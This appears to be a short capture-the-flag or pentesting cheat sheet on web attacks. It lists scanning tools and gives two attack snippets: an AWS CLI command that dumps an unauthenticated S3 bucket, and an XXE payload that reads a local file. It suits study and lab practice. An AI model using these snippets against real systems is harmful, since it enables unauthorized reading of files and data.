Web

Web

Tools

  • wpscan - Website

    Scan Wordpress sites for vulnerabilities.

  • nikto - GitHub

    Website scanner implemented in Perl.

  • Burpsuite - Website

    Most used tool to do web pentesting. It is a proxy that allows you to intercept and modify HTTP requests and responses.

Attacks

  • AWS / S3 Buckets dump

    Dump all files from a S3 bucket that does not require authentication.

    aws s3 cp --recursive --no-sign-request s3://<bucket_name> .

  • XXE : XML External Entity

    Include local files in XML. Can be used to make an LFI from a XML parser. XML script to display the content of the file /flag :

    Don’t forget to use on Windows (for utf16).

    <?xml version="1.0"?>
<!DOCTYPE data [
<!ELEMENT data (#ANY)>
<!ENTITY file SYSTEM "file:///flag">
]>
<data>&file;</data>
Enumeration GraphQL PHP Request and Cookie Forgery SQL Injection XSS JWT